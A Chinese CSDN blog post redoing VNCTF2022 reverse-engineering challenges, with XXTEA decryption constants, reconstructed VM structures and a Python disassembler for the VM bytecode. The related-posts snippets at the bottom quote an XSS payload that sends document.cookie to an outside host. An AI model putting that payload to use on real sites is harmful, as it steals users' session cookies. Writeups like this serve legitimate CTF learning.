VNCTF2022 wp复现

于 2024-07-24 11:33:16 发布
阅读量636 收藏 18
点赞数 13
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wgf42421/article/details/140658645
版权

BabyMaze

直接去看原文吧:转自: https://ppppz.net/2022/02/08/BabyMaze/

CM1

gda打开apk.(jadx看不到FileUtils源码)

加载了 classes.dex, 传入FileUtils 和 进行了某些操作然后就变成了ooo。

在 assets中找到 ooo 导出。根据源码用vn2022循环异或 1024为一组。

生成新的dex文件。用jadx打开。

很明显XXTEA。直接解密。。

    k = [0x50703448, 0x4E565F59, 0x21465443, 0x4F764F21]
    res = [0x6CA42744, 0xC948EEAE, 0x0B26C84A, 0xD861543C, 0xAE634757, 0xB92F6878, 0x2100C7C6, 0xD9D4262A, 0x5CFE71C4, 0x32B376B5, 0x96202B87]

CM狗

参考链接贴上,慢慢复现

https://blog.shi1011.cn/ctf/2162#cm%E7%8B%97 https://blog.csdn.net/qq_52974719/article/details/123100965#t2 https://blog.csdn.net/m0_51911432/article/details/122914413#t4 http://s0rry.cn/archives/vnctf2022re-fu-xian#toc-head-6

struct REG
{
  _DWORD R[21]; // 21个寄存器
};

struct func
{
  void *call; // call 地址
  vm *ptr; // vm
};


struct vm
{
  REG reg; // 寄存器
  _DWORD Memory[1000];
  _DWORD rip; // VM下一个执行地址
  _DWORD index;
  void *data; // opcode
  func *func[100];
  _QWORD isExit;
};

下图是offset 值,看一下转的对不对。

init中定义了操作数对应的函数

整理后如下

func *__usercall main___ptr_MzVm__init@<rax>(vm *a1) {
    a1->func[0] = &init;
    a1->func[1] = main___ptr_MzVm__init_func2;
    a1->func[2] = main___ptr_MzVm__init_func3;
    a1->func[3] = main___ptr_MzVm__init_func4;
    a1->func[4] = main___ptr_MzVm__init_func5;
    a1->func[5] = main___ptr_MzVm__init_func6;
    a1->func[6] = main___ptr_MzVm__init_func7;
    a1->func[7] = main___ptr_MzVm__init_func8;
    a1->func[8] = main___ptr_MzVm__init_func9;
    a1->func[9] = main___ptr_MzVm__init_func10;
    a1->func[10] = main___ptr_MzVm__init_func11;
    a1->func[11] = main___ptr_MzVm__init_func12;
    a1->func[12] = main___ptr_MzVm__init_func13;
    a1->func[13] = main___ptr_MzVm__init_func14;
    a1->func[14] = main___ptr_MzVm__init_func15;
    a1->func[15] = main___ptr_MzVm__init_func16;
    a1->func[16] = main___ptr_MzVm__init_func17;
    a1->func[17] = main___ptr_MzVm__init_func18;
    a1->func[98] = main___ptr_MzVm__init_func19;
    a1->func[99] = main___ptr_MzVm__init_func20;
}

右击 a1 转为 struct格式

void __golang main___ptr_MzVm__run(vm *a1)
{
  vm *v1; // rbx
  _DWORD *data; // rsi
  unsigned __int64 rip; // rax
  unsigned __int64 op1; // rdi
  unsigned __int64 v5; // r8
  unsigned int op2; // er8
  unsigned __int64 v7; // rax
  unsigned int op3; // esi
  __int64 v9; // [rsp+0h] [rbp-18h]
  void *retaddr; // [rsp+18h] [rbp+0h] BYREF

  while ( (unsigned __int64)&retaddr <= *(_QWORD *)(*(_QWORD *)NtCurrentTeb()->NtTib.ArbitraryUserPointer + 16LL) )
    runtime_morestack_noctxt();
  v1 = a1;
  while ( !LOBYTE(v1->isExit) )
  {
    data = v1->data;
    rip = (unsigned int)v1->rip;
    if ( rip >= 0xBB8 )
      runtime_panicIndex(v9);
    op1 = (unsigned int)data[rip];
    v5 = (unsigned int)(rip + 1);
    if ( v5 >= 0xBB8 )
      runtime_panicIndex(v9);
    op2 = data[v5];
    v7 = (unsigned int)(rip + 2);
    if ( v7 >= 0xBB8 )
      runtime_panicIndex(v9);
    op3 = data[v7];
    if ( op1 >= 0x64 )
      runtime_panicIndex(v9);
    v9 = __PAIR64__(op3, op2);
    ((void (*)(void))v1->func[op1]->call)();
    v1 = a1;
    a1->rip += 3;
  }
}

双击data来到opcode,每轮使用3个操作数。在ida中这样设置一下看清每一轮。

op=1, func2

HIDWORD测试,小端序 高位

    unsigned char v[] = {0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88};
    QWORD *a = (QWORD *) v;
    printf("%llX", HIDWORD(*a)); // 88776655

  ptr->reg.R[(unsigned int)a1] = HIDWORD(a1);  //低位取索引,高位取值 R[index]= value

op=2, func3

v2->reg.R[(unsigned int)a1] = v2->reg.R[HIDWORD(a1)];

R[low] = R[hi] , 通过索引赋值到R数组中

op=5, func6

Memory[result] = reg.R[a1];

op=6, func7

reg.R[a1] = Memory[ptr->index];
ptr->index++;

op=7, func8

R[low] += R[hi]

op=7, func9

R[low] -= R[hi]

func11

R[low] *= R[hi]

func12

R[low] ^= R[hi]

func13

  result = (unsigned int)(3 * v2->reg.R[a1]);
  v2->rip = result;
  =>
  rip = 3 * reg.R[a1]
  => jmp reg.R[a1]

func15

  result = (unsigned int)ptr->reg.R[HIDWORD(a1)];
  if ( (_DWORD)result != ptr->reg.R[(unsigned int)a1] ) ; R[HI] != R[LO]
  {
    result = (unsigned int)(3 * ptr->reg.R[19]);        ; JMP R[19]
    ptr->rip = result;
  }

op=0x61, func18 输出字符

scanf

op=0x62, func19 输出字符

fmt_Fprint

op=0x63, func20

注释里标了

vmquit

脚本

from string import printable

_m = list(printable.encode())
_m.remove(10)
_m.remove(13)
_hex = lambda _d: f"0x{_d:02x}" if _d > 15 else _d
_chr = lambda _v: hex(_v) if _v not in _m else f"'{chr(_v)}'"
maps = {
    0x1: "nop",
    0x2: "mov R[{num}], {right} ; {ch}",
    0x3: "mov R[{num}], R[{right}]",
    0x4: "mov R[{num}], Memory[{right}]",
    0x5: "mov Memory[num] R[{right}]",
    0x6: "push R[{num}]",
    0x7: "pop R[{num}]",
    0x8: "add R[{num}], R[{right}]",
    0x9: "dec R[{num}], R[{right}]",
    0xa: "div R[{num}], R[{right}]",
    0xb: "mul R[{num}], R[{right}]",
    0xc: "xor R[{num}], R[{right}]",
    0xd: "jmp R[{num}]",
    0xe: "cmp R[{num}] R[{right}], je R[19]",
    0xf: "cmp R[{num}] R[{right}], jne R[19]",
    0x10: "cmp R[{num}] R[{right}], jb R[19]",
    0x11: "cmp R[{num}] R[{right}], ja R[19]",
    0x62: "getchar R[{num}]",
    0x63: "putchar R[{num}]",
    0x64: "vm quit"
}
data = [0, 0, 0, 0, 0, 0, 0x1, 0, 0x57, 0x62, 0, 0, 0x1, 0, 0x65, 0x62, 0, 0, 0x1, 0, 0x6C, 0x62, 0, 0,
        0x1, 0, 0x63, 0x62, 0, 0, 0x1, 0, 0x6F, 0x62, 0, 0, 0x1, 0, 0x6D, 0x62, 0, 0, 0x1, 0, 0x65, 0x62, 0, 0,
        0x1, 0, 0x20, 0x62, 0, 0, 0x1, 0, 0x74, 0x62, 0, 0, 0x1, 0, 0x6F, 0x62, 0, 0, 0x1, 0, 0x20, 0x62, 0, 0,
        0x1, 0, 0x56, 0x62, 0, 0, 0x1, 0, 0x4E, 0x62, 0, 0, 0x1, 0, 0x43, 0x62, 0, 0, 0x1, 0, 0x54, 0x62, 0, 0,
        0x1, 0, 0x46, 0x62, 0, 0, 0x1, 0, 0x32, 0x62, 0, 0, 0x1, 0, 0x30, 0x62, 0, 0, 0x1, 0, 0x32, 0x62, 0, 0,
        0x1, 0, 0x32, 0x62, 0, 0, 0x1, 0, 0x21, 0x62, 0, 0, 0x1, 0, 0xA, 0x62, 0, 0, 0x1, 0, 0x69, 0x62, 0, 0,
        0x1, 0, 0x6E, 0x62, 0, 0, 0x1, 0, 0x70, 0x62, 0, 0, 0x1, 0, 0x75, 0x62, 0, 0, 0x1, 0, 0x74, 0x62, 0, 0,
        0x1, 0, 0x20, 0x62, 0, 0, 0x1, 0, 0x66, 0x62, 0, 0, 0x1, 0, 0x6C, 0x62, 0, 0, 0x1, 0, 0x61, 0x62, 0, 0,
        0x1, 0, 0x67, 0x62, 0, 0, 0x1, 0, 0x3A, 0x62, 0, 0, 0x1, 0, 0xA, 0x62, 0, 0, 0x1, 0x13, 0x49, 0x1, 0x3, 0,
        0x1, 0x1, 0x2B, 0x1, 0x2, 0x1, 0x61, 0, 0, 0x5, 0, 0, 0x8, 0x1, 0x2, 0xE, 0x1, 0x3, 0x1, 0, 0, 0x5, 0, 0,
        0, 0, 0, 0, 0, 0, 0x6, 0, 0, 0x1, 0x5, 0x100, 0xA, 0, 0x5, 0x2, 0x6, 0, 0x6, 0, 0, 0x7, 0x6, 0,
        0x2, 0, 0x6, 0xA, 0, 0x5, 0x2, 0x6, 0, 0x6, 0, 0, 0x7, 0x6, 0, 0x2, 0, 0x6, 0xA, 0, 0x5, 0x2, 0x6, 0,
        0x6, 0, 0, 0x7, 0x6, 0, 0, 0, 0, 0x6, 0, 0, 0x1, 0x5, 0x100, 0xA, 0, 0x5, 0x2, 0x7, 0, 0x6, 0, 0,
        0x7, 0x7, 0, 0x2, 0, 0x7, 0xA, 0, 0x5, 0x2, 0x7, 0, 0x6, 0, 0, 0x7, 0x7, 0, 0x2, 0, 0x7, 0xA, 0, 0x5,
        0x2, 0x7, 0, 0x6, 0, 0, 0x7, 0x7, 0, 0, 0, 0, 0x6, 0, 0, 0x1, 0x5, 0x100, 0xA, 0, 0x5, 0x2, 0x8, 0,
        0x6, 0, 0, 0x7, 0x8, 0, 0x2, 0, 0x8, 0xA, 0, 0x5, 0x2, 0x8, 0, 0x6, 0, 0, 0x7, 0x8, 0, 0x2, 0, 0x8,
        0xA, 0, 0x5, 0x2, 0x8, 0, 0x6, 0, 0, 0x7, 0x8, 0, 0, 0, 0, 0x6, 0, 0, 0x1, 0x5, 0x100, 0xA, 0, 0x5,
        0x2, 0x9, 0, 0x6, 0, 0, 0x7, 0x9, 0, 0x2, 0, 0x9, 0xA, 0, 0x5, 0x2, 0x9, 0, 0x6, 0, 0, 0x7, 0x9, 0,
        0x2, 0, 0x9, 0xA, 0, 0x5, 0x2, 0x9, 0, 0x6, 0, 0, 0x7, 0x9, 0, 0, 0, 0, 0x6, 0, 0, 0x1, 0x5, 0x100,
        0xA, 0, 0x5, 0x2, 0xA, 0, 0x6, 0, 0, 0x7, 0xA, 0, 0x2, 0, 0xA, 0xA, 0, 0x5, 0x2, 0xA, 0, 0x6, 0, 0,
        0x7, 0xA, 0, 0x2, 0, 0xA, 0xA, 0, 0x5, 0x2, 0xA, 0, 0x6, 0, 0, 0x7, 0xA, 0, 0, 0, 0, 0x6, 0, 0,
        0x1, 0x5, 0x100, 0xA, 0, 0x5, 0x2, 0xB, 0, 0x6, 0, 0, 0x7, 0xB, 0, 0x2, 0, 0xB, 0xA, 0, 0x5, 0x2, 0xB, 0,
        0x6, 0, 0, 0x7, 0xB, 0, 0x2, 0, 0xB, 0xA, 0, 0x5, 0x2, 0xB, 0, 0x6, 0, 0, 0x7, 0xB, 0, 0, 0, 0,
        0x6, 0, 0, 0x1, 0x5, 0x100, 0xA, 0, 0x5, 0x2, 0xC, 0, 0x6, 0, 0, 0x7, 0xC, 0, 0x2, 0, 0xC, 0xA, 0, 0x5,
        0x2, 0xC, 0, 0x6, 0, 0, 0x7, 0xC, 0, 0x2, 0, 0xC, 0xA, 0, 0x5, 0x2, 0xC, 0, 0x6, 0, 0, 0x7, 0xC, 0,
        0, 0, 0, 0x6, 0, 0, 0x1, 0x5, 0x100, 0xA, 0, 0x5, 0x2, 0xD, 0, 0x6, 0, 0, 0x7, 0xD, 0, 0x2, 0, 0xD,
        0xA, 0, 0x5, 0x2, 0xD, 0, 0x6, 0, 0, 0x7, 0xD, 0, 0x2, 0, 0xD, 0xA, 0, 0x5, 0x2, 0xD, 0, 0x6, 0, 0,
        0x7, 0xD, 0, 0, 0, 0, 0x6, 0, 0, 0x1, 0x5, 0x100, 0xA, 0, 0x5, 0x2, 0xE, 0, 0x6, 0, 0, 0x7, 0xE, 0,
        0x2, 0, 0xE, 0xA, 0, 0x5, 0x2, 0xE, 0, 0x6, 0, 0, 0x7, 0xE, 0, 0x2, 0, 0xE, 0xA, 0, 0x5, 0x2, 0xE, 0,
        0x6, 0, 0, 0x7, 0xE, 0, 0, 0, 0, 0x6, 0, 0, 0x1, 0x5, 0x100, 0xA, 0, 0x5, 0x2, 0xF, 0, 0x6, 0, 0,
        0x7, 0xF, 0, 0x2, 0, 0xF, 0xA, 0, 0x5, 0x2, 0xF, 0, 0x6, 0, 0, 0x7, 0xF, 0, 0x2, 0, 0xF, 0xA, 0, 0x5,
        0x2, 0xF, 0, 0x6, 0, 0, 0x7, 0xF, 0, 0, 0, 0, 0x6, 0, 0, 0x1, 0x5, 0x100, 0xA, 0, 0x5, 0x2, 0x10, 0,
        0x6, 0, 0, 0x7, 0x10, 0, 0x2, 0, 0x10, 0xA, 0, 0x5, 0x2, 0x10, 0, 0x6, 0, 0, 0x7, 0x10, 0, 0x2, 0, 0x10,
        0xA, 0, 0x5, 0x2, 0x10, 0, 0x6, 0, 0, 0x7, 0x10, 0, 0, 0, 0, 0x5, 0x6, 0, 0x5, 0x7, 0, 0x5, 0x8, 0,
        0x5, 0x9, 0, 0x5, 0xA, 0, 0x5, 0xB, 0, 0x5, 0xC, 0, 0x5, 0xD, 0, 0x5, 0xE, 0, 0x5, 0xF, 0, 0x5, 0x10, 0,
        0x6, 0x1, 0, 0x6, 0x2, 0, 0x1, 0x14, 0x11C, 0x1, 0, 0x154, 0xC, 0, 0, 0x1, 0, 0xE8D1D5DF, 0x1, 0x13, 0x183, 0x1, 0x14, 0x153,
        0xE, 0x1, 0, 0x1, 0, 0xF5E3C114, 0xE, 0x2, 0, 0x6, 0x1, 0, 0x6, 0x2, 0, 0x1, 0x14, 0x127, 0x1, 0, 0x154, 0xC, 0, 0,
        0x1, 0, 0x228EC216, 0x1, 0x13, 0x183, 0x1, 0x14, 0x153, 0xE, 0x1, 0, 0x1, 0, 0x89D45A61, 0xE, 0x2, 0, 0x6, 0x1, 0, 0x6, 0x2, 0,
        0x1, 0x14, 0x132, 0x1, 0, 0x154, 0xC, 0, 0, 0x1, 0, 0x655B8F69, 0x1, 0x13, 0x183, 0x1, 0x14, 0x153, 0xE, 0x1, 0, 0x1, 0, 0x2484A07A,
        0xE, 0x2, 0, 0x6, 0x1, 0, 0x6, 0x2, 0, 0x1, 0x14, 0x13D, 0x1, 0, 0x154, 0xC, 0, 0, 0x1, 0, 0xD9E5E7F8, 0x1, 0x13, 0x183,
        0x1, 0x14, 0x153, 0xE, 0x1, 0, 0x1, 0, 0x3A441532, 0xE, 0x2, 0, 0x6, 0x1, 0, 0x6, 0x2, 0, 0x1, 0x14, 0x148, 0x1, 0, 0x154,
        0xC, 0, 0, 0x1, 0, 0x91AB7E88, 0x1, 0x13, 0x183, 0x1, 0x14, 0x153, 0xE, 0x1, 0, 0x1, 0, 0x69FC64BC, 0xE, 0x2, 0, 0x6, 0x1, 0,
        0x1, 0, 0x7D3765, 0xE, 0x1, 0, 0x1, 0, 0x189, 0xC, 0, 0, 0x63, 0, 0, 0x1, 0x3, 0x9E3779B9, 0x1, 0x4, 0x95C4C, 0x1, 0x5, 0x871D,
        0x1, 0x6, 0x1A7B7, 0x1, 0x7, 0x12C7C7, 0x1, 0x8, 0, 0x1, 0x11, 0x10, 0x1, 0x12, 0x20, 0x1, 0x13, 0x160, 0x1, 0xA, 0, 0x1, 0xB, 0x20,
        0x1, 0xC, 0x1, 0x7, 0x8, 0x3, 0x2, 0, 0x2, 0xA, 0, 0x11, 0x7, 0, 0x4, 0x2, 0xE, 0, 0x2, 0, 0x2, 0x7, 0, 0x8,
        0x2, 0xF, 0, 0x2, 0, 0x2, 0x9, 0, 0x12, 0x7, 0, 0x5, 0x2, 0x10, 0, 0x2, 0, 0xE, 0xB, 0, 0xF, 0xB, 0, 0x10,
        0x7, 0x1, 0, 0x2, 0, 0x1, 0xA, 0, 0x11, 0x7, 0, 0x6, 0x2, 0xE, 0, 0x2, 0, 0x1, 0x7, 0, 0x8, 0x2, 0xF, 0,
        0x2, 0, 0x1, 0x9, 0, 0x12, 0x7, 0, 0x7, 0x2, 0x10, 0, 0x2, 0, 0xE, 0xB, 0, 0xF, 0xB, 0, 0x10, 0x7, 0x2, 0,
        0x8, 0xB, 0xC, 0xE, 0xB, 0xA, 0xC, 0x14, 0, 0, 0, 0, 0x1, 0, 0x6E, 0x62, 0, 0, 0x1, 0, 0x6F, 0x62, 0, 0,
        0xC, 0x14, 0, 0, 0, 0, 0x1, 0, 0x79, 0x62, 0, 0, 0x1, 0, 0x65, 0x62, 0, 0, 0x1, 0, 0x73, 0x62, 0, 0,
        0xC, 0x14, 0]


for i in range(0, len(data), 3):
    funcItem, arg1, arg2 = data[i], data[i + 1], data[i + 2]
    # print(funcItem+1, arg1, arg2)
    print(hex(i // 3).rjust(5, " ") + ":", maps[funcItem + 1].format(num=arg1, right=_hex(arg2), ch=_chr(arg2)))

分析汇编。tea。解密。

wgf42421
关注
VNCTF2022公开赛-misc-仔细找找(复现
ookami6497的博客
03-12 1044
放大发现里面大多数都是白点,而且还混有其他有颜色的点,前面地方能看出vn两个字母 参考这个大佬的博客说是要取出所有的杂色点 大佬的代码 from PIL import Image img = Image.open(r'g:\share\20220212\flag.png') w, h = img.size res = Image.new('RGB', (w//50, h//31), 255) for x in range(w): for y in range(h): ...
VNCTF2022_Pwn_clear_got_WP
weixin_56434818的博客
02-14 909
VNCTF2022_Pwn_clear_got_WP 文章目录VNCTF2022_Pwn_clear_got_WP检查文件IDA查看题给elf文件利用思路exp 检查文件 RELRO半开,没有canary,开NX,没开PIE。 IDA查看题给elf文件 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[92]; // [rsp+0h] [rbp-60h] BYREF int v5; // [rsp
VNCTF2022 WriteUp
mumuzi的博客
02-13 3145
VNCTF2022
VNCTF2022 web wp
m0_67403240的博客
03-01 1129
GameV4.0 js/data.js下有段FLAG的base64加密 Vk5DVEYlN0JXZWxjb21lX3RvX1ZOQ1RGMjAyMiU3RA== 解码就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 非预期 xss,没有过滤,前几次一直不行,session解密木得flag,不知道最后怎么又可以了,www <script>window.open('http://ip:7777/'+document.cookie)</script> 然后把s
VNCTF2022公开赛
shinygod的博客
03-15 458
gocalc0 00x1预期解 点击 把session拿去解码一下(末尾有==base64解码一下) 两次编码就出来了(本来我以为) 00x2非预期解 import ( _ "embed" "fmt" "os" "reflect" "strings" "text/template" "github.com/gin-contrib/sessions" "github.com/gin-contrib/sessions/cookie" "github.com/gin-gonic/gi
[VNCTF 2022] easyjava
Sentiment的博客
06-10 1991
提示传参随便传个参数后,发现是Tomcat框架的直接读文件 web.xml没啥信息 后来发现有个classes目录 file协议读取文件即可(JDK 9之前,也可以用协议),读取后进行反编译,最开始用的jd-gui,结果有一个地方反编译有点小差错还是用在线工具吧。JAVA反向工程网 (javare.cn)反编译好后先看下的doGet函数 这里的方法就是检测传入的参数值是不是vnctf2022 所以这里如果想得到key就需要name传参vnctf2022,但传参后又会执行if中的语句,if和else中的语句相
VNCTF2022-RE
qq_52974719的博客
02-23 1231
RE BabyMaze python3.8以上版本不可直接uncompyle反编译 用py38的dis或decompy++都可以反汇编 这里用decompy++ 执行 .\pycdas BabyMaze.pyc > code.txt 部分字节码如下 BabyMaze.pyc (Python 3.8) [Code] File Name: .\BabyMaze.py Object Name: <module> Arg Count: 0 Pos Only
ISCC-2022 部分wp
m0_67393342的博客
09-09 1570
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2297
2022 CISCN 初赛pwn的完整wp
VNCTF 2022 web
Blazing-Angel的博客
02-16 1729
前言 复现一下vnctf GameV4.0 签到 newcalc0 源码 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json()); app.use(express.static("s
2022 VNCTF easyROPtocol
weixin_46483787的博客
04-09 1834
一道协议逆向+orwROP的题,基本上难度在于给出符合要求的协议头和校验和 拿到题目: 在打印的信息中我们可以获取到,这个程序是TCP protocol的C语言实现 于是先把TCP的头部结构拿过来: 首先进add函数里看看: 可以看到能够申请最多4个chunk,每个chunk最多0x1000 生成之后要通过check_head函数和check_sum的检测 首先看check_head: 从这里可以得到确定一些头部信息,如源端口和目的端口,还有urgent_ptr必须为0,等,还有一些属性只能缩小范围,
VNCTF 2022 wp web
weixin_51458899的博客
02-20 539
vnctf InterestingPHP 看见一个rce,第一时间想到蚁剑利用 发现phpinfo不行 ?exp=print_r(ini_get_all()); 也可以输出配置信息 收集到的disabled_function include,include_once,require,require_once,stream_get_contents,fwrite,readfile,file_get_contents,fread,fgets,fgetss,file,parse_ini_file,show_so
VNCTF2022wp
sln_1550的博客
02-14 1240
排名第6,逆向没有AK,差一题(要不然就第二了),不过发现自己的不足也算是有进步。 CRYPTO: ezmath n取到直接乘4返回即可 MISC 问卷 略 仔细找找 图片中有间隔几乎相等的杂色点,写脚本取出: from PIL import Image img = Image.open(r'g:\share\20220212\flag.png') w, h = img.size res = Image.new('RGB', (w//50, h//31), 255) for x in range(w)
[VNCTF2022]部分wp
Huamang的博客
02-23 690
VNCTF2022
VNCTF2022 web全复现
Pysnow's Blog
04-07 3085
web 文章目录webGameV4.0gocalc0easyJ4va信息收集获取key反序列化newcalc0非预期PoC 1PoC 2预期解InterestingPHP解法一解法二 GameV4.0 前端小游戏题,直接想到查看js源代码 在data.js文件中搜索到了关键词flag,且后面附着着一个base64编码的字符串,解码试试 得到flag,再将其url解码一下就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 go语言的ssti,传入{{.}}指向当前的类,类似于
vnctf2022复现
weixin_45805993的博客
05-28 531
eazyjava file协议读url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes 有用的class //HelloWorldServlet.class package servlet; import entity.User; import java.io.IOException; import java.util.Base64; import java.util.Base64.Decoder; import javax.servlet.
vnctf 2022 re复现
个人博客:http://s0rry.cn
03-09 5858
BabyMaze .pyc的文件,第一反应是用uncompyle6来直接逆。当然啦,肯定不会是我想的这么简单,我还是太年轻了,这道题有花指令让uncompyle6没法用。所以得先去花指令然后才能用工具逆字节码。 去花指令 开始我们并不知道有花指令,所以我们先看看字节码,这里用python的marshal库和dis库来读取二进制pyc文件并反汇编成字节码来分析: import dis,marshal fp = open('BabyMaze','rb').read() #这里用open只是打开了一个文件,还
VNCTF2022公开赛 Web gocalc0
cadandme的博客
02-13 703
粗心大意要不得
ctfshow XXE web373-web378 wp
mumuzi的博客
02-11 1823
文章目录web373web374-376web377web378 web373 XXE(XML External Entity Injection) 全称为 XML 外部实体注入。注入的是XML外部实体 参考文章:一篇文章带你深入理解漏洞之 XXE 漏洞 libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; ) flag在flag里 <?xml version="1.0"
强网杯 2022 谍影重重wp
最新发布
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值